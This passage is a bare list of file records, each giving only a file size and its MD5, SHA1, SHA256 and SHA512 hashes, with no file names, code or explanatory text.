SHA51210e2b720ae47a24a9645b7ac697b4dd5708bd37ce6fddc4147d167c76a9225e87cb33a87796e23eda3093b03dea6becd2a1398fc1c043c140fece0e7c1e73094
-
Filesize
1KB
MD5ba9f1c82fc41d29d27459d39a565c300
SHA112b556b534bcf476548f28699e499845e1c33536
SHA25601330f29f57e1e63911b32ce9d101867bd4655f32a01d9eabf2ef6a28110612b
SHA5126ab0a877062a056d7bdf252b2a9fbe8e03f8015bcaed72ad159e621b1c2fb79f444a2d7f5170e7309eb9d589707fcbd3e540be8f148beebd7f0e82209422a8d8
-
Filesize
1KB
MD512ff85d31d9e76455b77e6658cb06bf0
SHA145788e71d4a7fe9fd70b2c0e9494174b01f385eb
SHA2561c60ff7821e36304d7b4bcdd351a10da3685e9376775d8599f6d6103b688a056
SHA512fcc4084ab70e49821a3095eeac1ef85cf02c73fdb787047f9f6b345132f069c566581921fac98fab5ddec1a550c266304cce186e1d46957946b6f66dba764d2f
-
Filesize
1KB
MD5969a07b130e6a24f99837abfaae8e214
SHA1e866d389bcf06f56d2effdcea067c8b9c023ccc1
SHA2566b336495061db3fe203263fb1a96b43f87a4aa1d494e7337e4e552218152203a
SHA512e799b27ad1a5ba0cfa6be8a190f5b85ed1e19850289adb653ae3ef6524790fb7e0f5c99470043481702bd81715b97aed5daa3b3538dcb008c3fbe7000a35748e
-
Filesize
1KB
MD581d4b189141a7c9c4e49c56d070aa960
SHA122fe2a1183079d954a5366f3b3a38e55d4b5bc6b
SHA256076f0113da0dd75067e83a47b6b8b4ac372ce9442198a90e49a68e5c06737119
SHA512bd05b846cb6a1f33ad740076566d9d28f4b64b048e70bdce5e853bb51e4494f4b081bbc61ef8d4e1cddacde4ce0408bd9c272e167ca105349d85206b42c087b3
-
Filesize
64B
MD58a424e81b5a6078deff05e153c04a0ee
SHA1bf209de0dbc1dbe7c5b5b511bd34bf447a3c049b
SHA25679ce6d6caea4a9eabf8fdbb2a1c58d43fb5a3c500c2dec3fce87c160d2c6bda3
SHA512aa01195e5c1d641304b08fed4a3bffc916972aa0bc20e928204cef1783f38922a03b761cf2010ccbace1ea0d2f18cda4eaeee4d8969f32fbae5f580e4e38522d
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
14KB
MD5012a668bd1043d6b0a4bcd03d02ded41
SHA18595831d19a06d5ad38cb38b793eb1bdcc16b816
SHA25657375e5d331ed567ca2da98b126ac585ff7829d15c31ad98eb452339e3ba1d05
SHA512e43947f10872db119daa4f28c70046941602831a8e8a871ccad45f8712a972d76b31a05282de7f4bc99d2e23fe40ef9dceaef3ea84b7c6532b85fee920269792
-
Filesize
2KB
MD5725d38d9eeadc9c2691063936b01f9ec
SHA1153fd5bd55cfd845516562291a7ab867d68145b5
SHA2560df3cdd812a582b5ddf5c8019fe7aecf03edb5760f4cf2d0c81ba73590a2ec43
SHA512fe2758ddaa974696c733367d479dc54695ee1f177275f3b26d575b3c27b8c968b6bab0ce1e5b715e6513d1f39d880462b3d8cc542507f2eeae531a9a6d337658
-
Filesize
2KB
MD564cafb884608c751a2bccaca7c582e0f
SHA1924f71ecb4903ab63a13a125e62fd6e5f5d20cb2
SHA2563250e852f2fb3e61bd0642d92f1decac666777da7c4d59d6270ee49fc856151b
SHA512ddd68d3d13bd65f926f6be67ac891c143d6e282ee955871382452f2627ca42ed54e7363d83651b904cdf8054bc1d12a02becd44ac1b5cdc98ac42fc7ebfe97a0
-
Filesize
2KB
MD52a6a3fe33c1b637df51f15b0ca3bbba3
SHA1beac8a47a2afba55c6d5b355b15b934257fdca92
SHA256675385e136bbe18f7b6fa6c6b0a6a278d081e83b2e5cbd8e6a79cbd85a434ad5
SHA512daa36dab915f138583d8ce68c7f9f6427f0ff720083154766e49829af47039233043977269f3a3861abfbbbe75ff404b8fa463a16fcdec337b0d4fd53d50bc1c
-
Filesize
2KB
MD5028e56b4f3a2c9e1044f2910077ad97c
SHA14036f79f56cc17b8f909c59d756275c3939d6dc9
SHA2566c73eb112b0fcbd0aade8b67556064cc31d94fa269aa81d327b168580310de57
SHA51219c742a2fc7fc4ec561c423bd0cfd7060b1689a27cd1d3879a503238bff15573c1136417844a458dd2c5bd07d9f30348fae2b520f1a3726d7a1b2cc3513bdba2
-
Filesize
2KB
MD534a986684d6dc38f0167ae4b48276747
SHA147f47a9a9ed3f24be09f43179d97e7fbb7bd204a
SHA256785dd864936ed144e1d721ea11ceea271495387ffd1b235b16c5d8cb3612b879
SHA512f1b5b291b9e9d38225b7bb6b357b15f78526dc76a3dd661b130a113939a9b72ce81efb3557006b1bca209150e7e971d73e7b5a885ec020c90dd6dcafca96a494
-
Filesize
2KB
MD5d4f8a13f8c90e2b3b2e7d30a553df39c
SHA15c5303ef682ffcd31e57d1abd900ba5b637d51e4
SHA256f7fc5b53e709adc1f4116ff47656f7262d7fb2859a100b3e3a5568453485649a
SHA51268b0b59a732fecc8b345fa0429039d36bc3031ab65198e4d3783a5c16fa768bb6562131c1db58d00ad9c4af7fd8d77aed3c2150930663280a6bbd635ba5831bd
-
Filesize
2KB
MD5c9ef9c214996db3d88f571226910c5d5
SHA1420ba30247b1e09f706557a7704a1ebee5d3165c
SHA256fa55a24dccbf28309642d958cbb73f5053e3a56baa0eda22d4581e0151f5f7c1
SHA512de91ef4268e67c4fa8d7216637bd9ca69ea33b108352675c954d4719d2d58b9414df78c6ebc8f622fcfbeda4ad5f981c2a17a48f7eeae8626cefe5b6894ec68d
-
Filesize
360KB
MD51136efb1a46d1f2d508162387f30dc4d
SHA1f280858dcfefabc1a9a006a57f6b266a5d1fde8e
SHA256eee9c44c29c2be011f1f1e43bb8c3fca888cb81053022ec5a0060035de16d848
SHA51243b31f600196eaf05e1a40d7a6e14d4c48fc6e55aca32c641086f31d6272d4afb294a1d214e071d5a8cce683a4a88b66a6914d969b40cec55ad88fde4077d3f5
-
Filesize
9.0MB
MD59ee2c39700819e5daab85785cac24ae1
SHA19b5156697983b2bdbc4fff0607fadbfda30c9b3b
SHA256e7c13a06672837a2ae40c21b4a1c8080d019d958c4a3d44507283189f91842e3
SHA51247d81ff829970c903f15a791b2c31cb0c6f9ed45fdb1f329c786ee21b0d1d6cd2099edb9f930824caceffcc936e222503a0e2c7c6253718a65a5239c6c88b649
-
Filesize
135KB
MD57ad31e7d91cc3e805dbc8f0615f713c1
SHA19f3801749a0a68ca733f5250a994dea23271d5c3
SHA2565b12c3838e47f7bc6e5388408a1701eb12c4bbfcd9c19efd418781304590d201
SHA512d7d947bfa40d6426d8bc4fb30db7b0b4209284af06d6db942e808cc959997cf23523ffef6c44b640f3d8dbe8386ebdc041d0ecb5b74e65af2c2d423df5396260
-
Filesize
3.5MB
MD5640be21102a295874403dc35b85d09eb
SHA1e8f02b3b8c0afcdd435a7595ad21889e8a1ab0e4
SHA256ed33e294d53a50a1778ddb7dca83032e9462127fce6344de2e5d6be1cd01e64b
SHA512ece0dfe12624d5892b94d0da437848d71b16f7c57c427f0b6c6baf757b9744f9e3959f1f80889ffefcb67a755d8bd7a7a63328a29ac9c657ba04bbdca3fea83e